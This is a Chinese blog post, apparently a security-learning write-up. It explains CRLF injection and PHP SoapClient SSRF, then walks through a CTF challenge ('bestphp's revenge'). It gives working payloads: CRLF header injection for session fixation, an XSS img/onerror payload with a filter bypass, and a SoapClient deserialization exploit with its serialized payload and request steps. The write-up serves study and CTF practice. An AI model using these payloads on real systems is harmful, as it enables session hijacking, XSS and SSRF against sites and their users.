<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF | Hexo</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="CRLF漏洞以及SOAP漏洞利用之CRLF与SSRFCRLF漏洞漏洞原理CRLF是“回车+换行(\r\n)”的简称，在http协议中，httpheader和httpbody是用两个CRLF分隔的，浏览器是根据这两个CRLF来取出http内容并显示出来的，所以如果我们可以控制http消息头的字符，注入一些恶意的换行，这样可以注入一些会话Cookie或HTML代码，所以CRLF injection也叫">
<meta property="og:type" content="article">
<meta property="og:title" content="CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF">
<meta property="og:url" content="http://example.com/2021/10/18/CRLF%E6%BC%8F%E6%B4%9E%E4%BB%A5%E5%8F%8ASoapClinet%E8%A7%A6%E5%8F%91%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="CRLF漏洞以及SOAP漏洞利用之CRLF与SSRFCRLF漏洞漏洞原理CRLF是“回车+换行(\r\n)”的简称，在http协议中，httpheader和httpbody是用两个CRLF分隔的，浏览器是根据这两个CRLF来取出http内容并显示出来的，所以如果我们可以控制http消息头的字符，注入一些恶意的换行，这样可以注入一些会话Cookie或HTML代码，所以CRLF injection也叫">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-10-17T16:00:00.000Z">
<meta property="article:modified_time" content="2021-10-18T05:01:18.505Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="ssrf">
<meta name="twitter:card" content="summary">
  
  
    <link rel="icon" href="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="https://ss3.baidu.com/9fo3dSag_xI4khGko9WTAnF6hhy/zhidao/pic/item/e4dde71190ef76c61d3907c89516fdfaae51676e.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
								<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
					        
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/SSRF/" style="font-size: 11.43px;">SSRF</a> <a href="/tags/SSTI/" style="font-size: 12.86px;">SSTI</a> <a href="/tags/http/" style="font-size: 11.43px;">http</a> <a href="/tags/java/" style="font-size: 12.86px;">java</a> <a href="/tags/misc/" style="font-size: 11.43px;">misc</a> <a href="/tags/nodejs/" style="font-size: 12.86px;">nodejs</a> <a href="/tags/php%E7%89%B9%E6%80%A7/" style="font-size: 12.86px;">php特性</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 18.57px;">sql注入</a> <a href="/tags/ssrf/" style="font-size: 12.86px;">ssrf</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 20px;">代码审计</a> <a href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" style="font-size: 15.71px;">命令执行</a> <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 11.43px;">文件上传</a> <a href="/tags/%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2%E5%8F%8A%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 10px;">文件泄露及代码审计</a> <a href="/tags/%E6%A1%86%E6%9E%B6/" style="font-size: 11.43px;">框架</a> <a href="/tags/%E6%A8%A1%E6%9D%BF/" style="font-size: 14.29px;">模板</a> <a href="/tags/%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">模板注入</a> <a href="/tags/%E7%88%86%E7%A0%B4/" style="font-size: 10px;">爆破</a> <a href="/tags/%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99/" style="font-size: 17.14px;">脚本编写</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="https://ss3.baidu.com/9fo3dSag_xI4khGko9WTAnF6hhy/zhidao/pic/item/e4dde71190ef76c61d3907c89516fdfaae51676e.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
						<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
			        
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-CRLF漏洞以及SoapClinet触发反序列化" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2021/10/18/CRLF%E6%BC%8F%E6%B4%9E%E4%BB%A5%E5%8F%8ASoapClinet%E8%A7%A6%E5%8F%91%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="article-date">
  	<time datetime="2021-10-17T16:00:00.000Z" itemprop="datePublished">2021-10-18</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ssrf/" rel="tag">ssrf</a></li></ul>
	</div>

        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF"><a href="#CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF" class="headerlink" title="CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF"></a>CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF</h1><h2 id="CRLF漏洞"><a href="#CRLF漏洞" class="headerlink" title="CRLF漏洞"></a>CRLF漏洞</h2><h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>CRLF是“回车+换行(\r\n)”的简称，在http协议中，httpheader和httpbody是用两个CRLF分隔的，浏览器是根据这两个CRLF来取出http内容并显示出来的，所以如果我们可以控制http消息头的字符，注入一些恶意的换行，这样可以注入一些会话Cookie或HTML代码，所以CRLF injection也叫HTTPReaponseSplitting，简称HRS</p>
<h4 id="CRLF注入产生的会话固定漏洞"><a href="#CRLF注入产生的会话固定漏洞" class="headerlink" title="CRLF注入产生的会话固定漏洞"></a>CRLF注入产生的会话固定漏洞</h4><p>当我们可以控制httpheader中的location字段时，我们可以就可以给访问者设置一个SESSION</p>
<h5 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 302 </span><br><span class="line">Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT </span><br><span class="line">Content- Type: text/html</span><br><span class="line">Content-Length: 154 </span><br><span class="line">Connection: close</span><br><span class="line">Location:http://www.sina.com.cn</span><br></pre></td></tr></table></figure>

<p>然后当我们输入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.sina.com.cn%0d%0aSet-cookie:JSPSESSID%3Dwooyun</span><br></pre></td></tr></table></figure>

<p>此时我们就设置了一个SESSION，造成会话固定漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT</span><br><span class="line">Content-Type: text/html </span><br><span class="line">Content-Length: 154 </span><br><span class="line">Connection: close </span><br><span class="line">Location: http://www.sina.com.cn</span><br><span class="line">Set-cookie: JSPSESSID=wooyun</span><br></pre></td></tr></table></figure>
<h4 id="CRLF注入造成无视浏览器Filter反射型XSS"><a href="#CRLF注入造成无视浏览器Filter反射型XSS" class="headerlink" title="CRLF注入造成无视浏览器Filter反射型XSS"></a>CRLF注入造成无视浏览器Filter反射型XSS</h4><p>实例</p>
<p>当一个网站接受url参数<a target="_blank" rel="noopener" href="http://ip/?url=xxx%EF%BC%8Cxxx%E6%94%BE%E5%9C%A8location%E5%90%8E%E9%9D%A2%E4%BD%9C%E4%B8%BA%E4%B8%80%E4%B8%AA%E8%B7%B3%E8%BD%AC%EF%BC%8C%E6%89%80%E4%BB%A5%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E8%BE%93%E5%85%A5">http://ip/?url=xxx，xxx放在location后面作为一个跳转，所以我们可以输入</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://test.sina.com.cn/?url=%0d%0a%0d%0a&lt;imgsrc=1onerror=alert(/xss/)&gt;</span><br></pre></td></tr></table></figure>
<p>则我们的返回包为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: </span><br><span class="line">&lt;img src=1 onerror=alert(/xss/)&gt;</span><br></pre></td></tr></table></figure>
<p>之前说的浏览器会根据两个CRLF把HTTP包分成头和体，然后将体显示出来，所以这里这个标签会显示出来，，造成xss</p>
<p>对于无视filter，只有数据包中http头中含有X-XSS-Protection并且为0时，浏览器才不会开启filter，所以我们可以利用一个CRLF将X-XSS-Protection: 0注入到数据包中，再用两个CRLF来注入xss代码，这样就可以绕过filter</p>
<p>而对于Location的注入只有webkit内核浏览器可以使用，其它浏览器可能会跳转</p>
<h2 id="SOAP漏洞利用之CRLF与SSRF"><a href="#SOAP漏洞利用之CRLF与SSRF" class="headerlink" title="SOAP漏洞利用之CRLF与SSRF"></a>SOAP漏洞利用之CRLF与SSRF</h2><p>每种开发语言都有自己的webservice实现框架，php也有，php的SOAP扩展是可以提供和使用webservices，这个扩展实现六个类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">高级类：SoapClient、SoapServer、SoapFault</span><br><span class="line"></span><br><span class="line">低级类：SoapHeader、SoapParam 和 SoapVar</span><br></pre></td></tr></table></figure>

<p>SoapClient语法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">public SoapClient :: SoapClient （mixed $wsdl [，array $options ]）</span><br></pre></td></tr></table></figure>

<p>由于SoapClinet类中的一个$options选项功能有这样一句话</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">The user_agent option specifies string to use in User-Agent header</span><br></pre></td></tr></table></figure>
<p>可见这个类可以让我们自定义user-agent，而httpheader有一个重要的content-type和content-length字段，可以控制发送的方式以及内容的长度，而user-agent在它们的上面，所以可以进行覆盖</p>
<p>因此我们可以利用CRLF来构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$payload = new SoapClient(null,array(&#x27;user_agent&#x27;=&gt;&quot;testrnCookie: PHPSESSID=08jl0ttu86a5jgda8cnhjtvq32rnContent-Type: application/x-www-form-urlencodedrnContent-Length:45rnrnusername=admin&amp;password=nu1ladmin&amp;code=470837rnrnrn&quot;,&#x27;location&#x27;=&gt;$location,</span><br><span class="line">&#x27;uri&#x27;=&gt;$uri));</span><br></pre></td></tr></table></figure>
<p>这个攻击的作用是从外网调用到soap的api来攻击内网，因此可以说是ssrf攻击</p>
<p>而这个攻击一般是利用SoapClient类中的魔术方法__call()触发的，猜测是触发__call()魔术方法发包</p>
<h2 id="实例（bestphp’s-revenge）"><a href="#实例（bestphp’s-revenge）" class="headerlink" title="实例（bestphp’s revenge）"></a>实例（bestphp’s revenge）</h2><p>打开页面，审计源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$b = &#x27;implode&#x27;;</span><br><span class="line">call_user_func($_GET[&#x27;f&#x27;], $_POST);</span><br><span class="line">session_start();</span><br><span class="line">if (isset($_GET[&#x27;name&#x27;])) &#123;</span><br><span class="line">    $_SESSION[&#x27;name&#x27;] = $_GET[&#x27;name&#x27;];</span><br><span class="line">&#125;</span><br><span class="line">var_dump($_SESSION);</span><br><span class="line">$a = array(reset($_SESSION), &#x27;welcome_to_the_lctf2018&#x27;);</span><br><span class="line">call_user_func($b, $a);</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>由于call_user_func()函数限制了一些函数，eval()函数在其中，而构造/flag.php，又得到一部分源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">session_start();</span><br><span class="line">echo &#x27;only localhost can get flag!&#x27;;</span><br><span class="line">$flag = &#x27;LCTF&#123;*************************&#125;&#x27;;</span><br><span class="line">if($_SERVER[&quot;REMOTE_ADDR&quot;]===&quot;127.0.0.1&quot;)&#123;</span><br><span class="line">       $_SESSION[&#x27;flag&#x27;] = $flag;</span><br><span class="line">   &#125;</span><br><span class="line">only localhost can get flag!</span><br></pre></td></tr></table></figure>
<p>可见我们要本地访问/flag.php才可以读取flag，所以我们可以利用SoapClient类来ssrf，首先我们需要利用反序列化来控制SoapClient类中的变量，所以我们可以利用序列化引擎和反序列化引擎的不同，导致无法正常反序列化，从而伪造数据</p>
<p>所以我们可以利用第一个call_user_func来构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">session_start([&#x27;serialize_handler&#x27;=&gt;&#x27;php_serialize&#x27;])</span><br></pre></td></tr></table></figure>
<p>来让序列化和反序列化的引擎不同，然后再通过将序列化数据赋值给$_SESSION[“name”]，让它将数据存储到文件时再进行序列化，并进行变量覆盖，然后取出文件，放进内存时进行反序列化，而由于我们设置的序列化和反序列化的引擎不同，所以当反序列化时会将”|“前面的值当成是键名，从而可以触发漏洞，exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$target = &quot;http://127.0.0.1/flag.php&quot;;</span><br><span class="line">$attack = new SoapClient(null,array(&#x27;location&#x27; =&gt; $target,</span><br><span class="line">    &#x27;user_agent&#x27; =&gt; &quot;N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n&quot;,</span><br><span class="line">    &#x27;uri&#x27; =&gt; &quot;123&quot;));</span><br><span class="line">$payload = urlencode(serialize($attack));</span><br><span class="line">echo $payload;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>所以我们可以先构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">get提交</span><br><span class="line">?f=session_start&amp;name=O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A3%3A%22123%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A56%3A%22N0rth3ty%0D%0ACookie%3A+PHPSESSID%3Dtcjr6nadpk3md7jbgioa6elfk4%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D</span><br><span class="line"></span><br><span class="line">post提交</span><br><span class="line">serialize_handler=php_serialize</span><br></pre></td></tr></table></figure>

<p>然后我们再构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">get提交</span><br><span class="line">?f=extract&amp;name=SoapClient</span><br><span class="line"></span><br><span class="line">post提交</span><br><span class="line">b=call_user_func</span><br></pre></td></tr></table></figure>
<p>通过extract函数来对$b变量进行覆盖，然后再通过调用SoapClient类中不存在的welcome_to_the_lctf2018函数来触发__call()魔术方法，从而将flag赋值给$_SESSION[“flag”]</p>
<p>最后用刚刚构造的PHPSESSID值来读取flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4</span><br></pre></td></tr></table></figure>
<p>参考文章：[<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1515276]">https://cloud.tencent.com/developer/article/1515276]</a></p>
<pre><code>[https://www.anquanke.com/post/id/153065#h2-1]

[https://www.jianshu.com/p/d4c304dbd0af]

[https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label1_0]
</code></pre>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/10/19/%E4%B8%8D%E5%8C%85%E5%90%AB%E6%95%B0%E5%AD%97%E5%92%8C%E5%AD%97%E6%AF%8D%E7%9A%84webshell/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          不包含数字和字母的webshell
        
      </div>
    </a>
  
  
    <a href="/2021/10/17/ruby%20ERB%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E4%BB%A5%E5%8F%8Ajwt%E4%BC%AA%E9%80%A0/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">ruby ERB模板注入以及jwt伪造</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="CRLF漏洞以及SoapClinet触发反序列化" data-title="CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF" data-url="http://example.com/2021/10/18/CRLF%E6%BC%8F%E6%B4%9E%E4%BB%A5%E5%8F%8ASoapClinet%E8%A7%A6%E5%8F%91%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"  data-images="https://ss3.baidu.com/9fo3dSag_xI4khGko9WTAnF6hhy/zhidao/pic/item/e4dde71190ef76c61d3907c89516fdfaae51676e.jpg" data-content="CRLF漏洞以及SOAP漏洞利用之CRLF与SSRF">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2021 John Doe
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>